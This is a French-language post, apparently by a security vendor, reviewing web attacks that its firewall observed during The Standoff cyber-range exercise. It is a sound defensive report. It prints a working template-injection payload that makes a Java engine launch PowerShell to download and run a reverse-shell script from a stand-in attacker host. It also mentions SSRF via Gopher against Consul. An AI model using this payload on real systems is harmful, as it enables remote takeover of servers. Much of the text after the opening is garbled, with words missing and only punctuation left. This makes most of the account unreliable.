Lors du dernier The Standoff, nous, l'équipe PT Expert Security Center , en parallèle avec les participants à l'affrontement du côté de la défense , avons surveillé l'infrastructure du site et les bureaux individuels de la copie numérique de la métropole déployée sur notre cyber polygone. Pour ce faire, nous avons déployé un centre d'opérations de sécurité (SOC) supplémentaire , qui, en quelque sorte, couvrait toute l'infrastructure, grâce auquel il «voyait» toutes les activités des participants de The Standoff et même un peu plus. L'un des outils de ce SOC était PT Application Firewall - un pare-feu de couche d'application Web (lisez les résultats du travail d'un autre de nos outils SOC - PT Sandbox - dans l' un de nos articles précédents). Ci-dessous, nous nous concentrerons exclusivement sur ce qui s'est passé sur le site du point de vue du Web et sur les cibles choisies par les équipes attaquantes.
Statistiques générales d'attaque
Dans le cadre de The Standoff, nous avons surveillé les attaques sur le portail du site lui-même, ainsi que sur 30 ressources Web incluses dans l'infrastructure de jeu du terrain d'entraînement. Il s'agissait de ressources utilisées à la fois dans le jeu principal (Meters of the 25 Hours office - une ressource pour transmettre les relevés de compteurs, Consul for Nuft - une plate-forme de gestion de services, qui sera discutée ci-dessous), et dans le bug bounty (par exemple, CMS Umbraco pour Bank of FF, Mantis Bugtracker for 25 Hours est un système de suivi des bogues pour les produits logiciels, rConfir RCE est un service de gestion de configuration réseau pour le groupe Big Bro). Les équipes de lecture ont reçu des points pour la mise en œuvre des risques, ainsi que la recherche de vulnérabilités dans les systèmes et les rapports.
Qui Ă©tait qui dans le cyber-polygone:
- Heavy Ship Logistics — , , , ;
- 25 Hours — , , , ;
- Tube — , , , ;
- Nuft — , ;
- Big Bro Group — ;
- Bank of FF — .
— , . — , bug bounty, «» , . 13. bug bounty . «», (, RCE Flack BookStore SQL Injection — capture the flag). 29 30 - ( , ). , , web application firewall.
The Standoff PT Application Firewall — .
. 1 . , — , — , — . , , . .
( The Standoff 12:00 12 14:00 17 ).
, PT Application Firewall, , , , . . , , , . , .
ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.
. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.
30 , , , 5 6 2 6 . , — , .
.
« 25 Hours» Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.
:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
.
, (, ), ( ) .
— , Nuft Consul. . Server Side Request Forgery, Gopher PUT .
200 .
, ( — ) ( — ).
( false positive) . .
proofs of concept , . , , , .
, CMS Umbraco ( Bank of FF) , - POST; .
, Meters, , — .
request path .
30 . , . . , (ODBC) backup «» .
, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .
Positive Technologies (PT Expert Security Center)